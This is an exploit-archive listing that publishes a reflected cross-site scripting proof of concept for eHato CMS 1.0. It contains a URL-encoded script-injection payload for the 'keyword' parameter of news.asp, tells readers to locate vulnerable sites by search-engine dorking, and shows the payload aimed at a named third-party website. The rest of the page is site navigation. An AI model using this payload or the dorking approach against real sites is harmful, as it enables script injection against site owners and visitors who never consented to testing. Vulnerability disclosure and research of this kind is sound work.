Headline
eHato CMS 1.0 Cross Site Scripting
eHato CMS version 1.0 suffers from a cross site scripting vulnerability.
eHato CMS 1.0 Cross Site Scripting
Posted Aug 9, 2023
Authored by indoushka
eHato CMS version 1.0 suffers from a cross site scripting vulnerability.
tags | exploit, xss
SHA-256 | 288795acae37e9889703f9a9e13f4dc91e382a11ff20d9b6c617e50c574fefb2
Download | Favorite | View
eHato CMS 1.0 Cross Site Scripting
====================================================================================================================================| # Title : eHato CMS 1.0 XSS Vulnerability || # Author : indoushka || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | | # Vendor : https://www.ehato.com | ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /news/news.asp?keyword=%25C3%25F6%25C1%25E4%25A6r%25B7j%25B4M'%22()%26%25<acx><ScRiPt%20>prompt(996317)</ScRiPt>&kind_id=&Page=2[+] http://wtatcs.orgtw/news/news.asp?keyword=%25C3%25F6%25C1%25E4%25A6r%25B7j%25B4M'%22()%26%25<acx><ScRiPt%20>prompt(996317)</ScRiPt>&kind_id=&Page=2Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================
File Tags
- ActiveX (932)
- Advisory (81,924)
- Arbitrary (16,191)
- BBS (2,859)
- Bypass (1,740)
- CGI (1,026)
- Code Execution (7,275)
- Conference (679)
- Cracker (841)
- CSRF (3,343)
- DoS (23,415)
- Encryption (2,369)
- Exploit (51,833)
- File Inclusion (4,221)
- File Upload (973)
- Firewall (821)
- Info Disclosure (2,766)
- Intrusion Detection (892)
- Java (3,043)
- JavaScript (858)
- Kernel (6,666)
- Local (14,447)
- Magazine (586)
- Overflow (12,690)
- Perl (1,423)
- PHP (5,142)
- Proof of Concept (2,338)
- Protocol (3,601)
- Python (1,535)
- Remote (30,753)
- Root (3,579)
- Rootkit (508)
- Ruby (612)
- Scanner (1,639)
- Security Tool (7,883)
- Shell (3,180)
- Shellcode (1,214)
- Sniffer (894)
- Spoof (2,206)
- SQL Injection (16,361)
- TCP (2,406)
- Trojan (687)
- UDP (893)
- Virus (664)
- Vulnerability (31,765)
- Web (9,661)
- Whitepaper (3,749)
- x86 (962)
- XSS (17,926)
- Other
File Archives
- August 2023
- July 2023
- June 2023
- May 2023
- April 2023
- March 2023
- February 2023
- January 2023
- December 2022
- November 2022
- October 2022
- September 2022
- Older
Systems
- AIX (428)
- Apple (2,002)
- BSD (373)
- CentOS (57)
- Cisco (1,922)
- Debian (6,810)
- Fedora (1,692)
- FreeBSD (1,244)
- Gentoo (4,322)
- HPUX (879)
- iOS (351)
- iPhone (108)
- IRIX (220)
- Juniper (67)
- Linux (46,418)
- Mac OS X (686)
- Mandriva (3,105)
- NetBSD (256)
- OpenBSD (484)
- RedHat (13,709)
- Slackware (941)
- Solaris (1,610)
- SUSE (1,444)
- Ubuntu (8,803)
- UNIX (9,286)
- UnixWare (186)
- Windows (6,568)
- Other